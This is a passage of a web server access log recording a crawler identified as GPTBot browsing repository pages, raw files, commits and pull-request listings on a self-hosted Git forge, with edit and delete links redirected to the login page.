192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:43:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip3.12" +[17/Feb/2026:17:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 9785] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" +[17/Feb/2026:17:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:17:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:17:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 14174] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" +[17/Feb/2026:17:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:17:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 9812] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:17:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:17:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:17:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 9815] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:17:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 906] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:17:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 1074] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:17:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:17:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:17:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:17:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 2130] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:17:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 28581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:17:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 6611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:17:43:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:17:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:17:44:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:17:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/storage.cpython-312.pyc" +[17/Feb/2026:17:44:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:17:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:17:44:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:17:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:17:44:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:17:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:17:44:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:17:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:17:44:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:17:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:17:44:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:17:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" +[17/Feb/2026:17:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11179] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=source" [Client 74.7.227.38] [Length 12960] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:17:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11180] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11096] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" +[17/Feb/2026:17:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:17:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:17:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12525] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11448] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=source" [Client 74.7.227.38] [Length 12526] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr 